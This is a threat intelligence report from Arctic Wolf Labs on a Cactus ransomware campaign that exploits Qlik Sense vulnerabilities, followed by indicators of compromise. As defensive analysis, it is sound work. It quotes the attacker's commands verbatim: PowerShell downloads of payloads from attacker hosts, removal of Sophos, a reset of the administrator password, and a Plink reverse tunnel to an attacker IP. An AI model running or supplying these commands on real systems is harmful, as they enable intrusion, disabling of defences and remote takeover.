Qlik Sense Exploited in Cactus Ransomware Campaign

Share :

This article aims to share timely and relevant information about a rapidly developing campaign under investigation. We are publishing it as early as possible for the benefit of the cybersecurity community and we will update this blog with more details as our investigation continues.

Key Takeaways

  • Exploitation of Qlik Sense application in the observed campaign.
  • Cactus ransomware deployed in association with observed exploitation.
  • ManageEngine UEMS and AnyDesk deployed for remote access.
  • Malicious activity was spawned by Qlik Sense Scheduler in each intrusion.

Summary

Arctic Wolf Labs has observed a new Cactus ransomware campaign which exploits publicly-exposed installations of Qlik Sense, a cloud analytics and business intelligence platform.[1] Based on available evidence, we assess that all vulnerabilities exploited were previously identified by researchers from Praetorian [2,3]. For more information on these vulnerabilities, see the advisories published by Qlik (CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365) as well as our Security Bulletin.

This campaign marks the first documented instance Arctic Wolf is aware of where threat actors deploying Cactus ransomware have exploited vulnerabilities in Qlik Sense for initial access.

Intrusion Analysis

Arctic Wolf labs is currently responding to several instances of Qlik Sense exploitation for initial access.

Analysis is still ongoing, but based on research from Praetorian [2,3] and gathered forensic evidence, we currently assess that based on patch level Qlik Sense is likely being exploited either via the combination or direct abuse of CVE-2023-41266[5], CVE-2023-41265[4] or potentially CVE-2023-48365 [5] to achieve code execution.

Following exploitation of Qlik Sense installations, the observed execution chain was consistent between all intrusions identified and involves the Qlik Sense Scheduler service (Scheduler.exe) spawning uncommon processes.

CurrentDirectory”:”C:\\Program Files\\Qlik\\Sense\\Scheduler\\

ParentImage”:”C:\\Program Files\\Qlik\\Sense\\Scheduler\\Scheduler.exe
    
CommandLine”:”C:\\Windows\\System32\\cmd.exe /c powershell iwr -uri http://zohoservice[.]net/putty.zip -OutFile c:\\windows\\temp\\putty.exe”    

Malicious activities involving Scheduler.exe

The threat actors leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control, including:

  • Renamed ManageEngine UEMS [7] executables, with a ZIP extension masquerading as Qlik files. These files were renamed again after being downloaded and invoked for silent installation
  • AnyDesk, downloaded directly from anydesk.com [8]
  • A Plink (PuTTY Link) binary, downloaded and renamed to putty.exe [9]
powershell iwr -URI 'http://216.107.136.46/Qliksens_updated.zip' -OutFile 'C:\Windows\appcompat\AcRes.exe'

C:\Windows\appcompat\AcRes.exe /silent

powershell  start-bitstransfer -source  http://zohoservice.net/qlik-sens-nov.zip -outfile c:\\windows\\temp\\Qliksens.exe

powershell Invoke-WebRequest https://download.anydesk.com/AnyDesk.exe -OutFile c:\windows\temp\file.exe

powershell  wget  'http://zohoservice.net/anydesk.zip' -outfile 'c:\\windows\\temp\\any.exe'

powershell iwr -uri http://zohoservice.net/putty.zip -OutFile c:\windows\temp\putty.exe

powershell Invoke-WebRequest https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe -OutFile C:\\windows\\temp\\putty.exe 

Multiple discovery commands were executed, and the output was redirected into .ttf files. We assume this was done to obtain the command output via the path traversal, but this assumption has yet to be verified.

dir c:\windows\appcompat  >  ../Client/qmc/fonts/qle.ttf

powershell Get-WmiObject -Class Win32_Product > ../Client/qmc/fonts/qle.ttf

quser > ../Client/qmc/fonts/qle.ttf

dir c:\windwos\temp > ../Client/qmc/fonts/qle.ttf  

The threat actor was further observed to:

  • Use msiexec to uninstall Sophos via its GUID
  • Change the administrator account password
  • Establish an RDP tunnel via Plink
MsiExec.exe /X{5C28F8A0-4BCB-4267-A869-2D589DF264F1} /qn > ../Client/qmc/fonts/qle.ttf

net user administrator Linux.110.110@123 > ../Client/qmc/fonts/qle.ttf

echo y "^"| c:\windows\temp\putty.exe -ssh -P 443 -l admin -pw  -R 45.61.147.176:50400:127.0.0.1:3389 45.61.147.176  

Cactus Ransomware

In several instances, immediately following exploitation, Arctic Wolf detected malicious activities early in the kill chain and worked with customers to disrupt the progression of the attacks. We gained further insight into these activities during the investigation of a recent IR case which resulted in the deployment of Cactus ransomware.

Current evidence revealed that the threat actors:

  • Used RDP for lateral movement
  • Downloaded WizTree disk space analyzer [10]
  • Leveraged rclone (renamed as svchost.exe) for data exfiltration

Based on significant overlaps observed in all intrusions we attribute all of the described attacks to the same threat actor, which was responsible for deployment of Cactus ransomware.

As the incident response (IR) investigation is ongoing, we will provide further technical details once they become available.

Indicators of Compromise

Indicator Type Context
45.61.147[.]176 IP Address ManageEngine Server
IP for zohoservice[.]net
216.107.136[.]46 IP Address ManageEngine Server
Hosting payload over HTTP
144.172.122[.]30 IP Address ManageEngine Server
Hosting payload over HTTP
zohoservice[.]net Domain Name Hosting payload over HTTP
http://zohoservice[.]net/putty.zip URL Renamed PuTTY Link (Plink)
http://216.107.136[.]46/Qliksens_update.zip URL Renamed ManageEngine UEMS
http://216.107.136[.]46/Qliksens_updated.zip URL Renamed ManageEngine UEMS
http://zohoservice[.]net/qlik-sens-Patch.zip URL Renamed ManageEngine UEMS
http://zohoservice[.]net/qlik-sens-nov.zip URL Renamed ManageEngine UEMS
C:\Users\Public\svchost.exe File path Renamed Rclone
c:\windows\temp\file.exe File path Renamed AnyDesk
c:\windows\temp\putty.exe File path Renamed PuTTY Link (Plink)
c:\windows\temp\Qliksens.exe File path Renamed ManageEngine UEMS
c:\windows\temp\any.exe File path Renamed AnyDesk Installer
C:\temp\putty.exe File path Renamed PuTTY Link (Plink)
C:\Windows\appcompat\AcRes.exe File path Renamed ManageEngine UEMS
file.exe Filename Renamed AnyDesk Installer
anydesk.zip Filename Renamed AnyDesk Installer
AcRes.exe Filename Renamed ManageEngine UEMS
any.exe Filename Renamed AnyDesk Installer
putty.zip Filename ZIP containing PuTTY Link (Plink)
Qlik_sense_enterprise.zip Filename Renamed ManageEngine UEMS
qlik-sens-nov.zip Filename Renamed ManageEngine UEMS
qlik-sens-Patch.zip Filename Renamed ManageEngine UEMS
Qliksens.exe Filename Renamed ManageEngine UEMS
Qliksens_updated.zip Filename Renamed ManageEngine UEMS
Qliksens_update.zip Filename Renamed ManageEngine UEMS
828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d SHA256 PuTTY Link (Plink)
https://download.anydesk.com/AnyDesk.exe URL Official AnyDesk Installer
90b009b15eb1b5bc4a990ecdd86375fa25eaa67a8515ae6c6b3b58815d46fa82 SHA256 ManageEngine UEMS Installer
3ac8308a7378dfe047eacd393c861d32df34bb47535972eb0a35631ab964d14d SHA256 ManageEngine UEMS Installer
6cb87cad36f56aefcefbe754605c00ac92e640857fd7ca5faab7b9542ef80c96 SHA256 ManageEngine UEMS Installer

References

1. https://www.qlik.com/us/products/qlik-sense
2. https://www.praetorian.com/blog/qlik-sense-technical-exploit/
3. https://www.praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/
4. https://nvd.nist.gov/vuln/detail/CVE-2023-41265
5. https://nvd.nist.gov/vuln/detail/CVE-2023-41266
6. https://nvd.nist.gov/vuln/detail/CVE-2023-48365
7. https://www.manageengine.com/unified-endpoint-management-security.html
8. https://anydesk.com/
9. https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
10. https://diskanalyzer.com/

By Stefan Hostetler, Markus Neis, Kyle Pagelow

Stefan Hostetler | Senior Threat Intelligence Researcher

Stefan is a Senior Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he focuses on extracting actionable insight from novel threats to help organizations protect themselves effectively.

Markus Neis | Principal Threat Intelligence Researcher

Markus Neis is a Principal Threat Intelligence Researcher in Arctic Wolf Labs focused on leading advanced threat research. He has more than a decade of experience in researching adversary tradecraft and responding to sophisticated attacks.

Kyle Pagelow | Principal Forensic Analyst

Kyle Pagelow is a Principal Forensic Analyst at Arctic Wolf Incident Response, focused on leading complex incident response and digital forensic investigations. He holds multiple certifications and has over 10 years of operational experience in incident response, defensive cyber operations, and threat intelligence.

Stefan Hostetler, Markus Neis, Kyle Pagelow

Stefan Hostetler, Markus Neis, Kyle Pagelow

Share :
Table of Contents
Categories
Subscribe to our Monthly Newsletter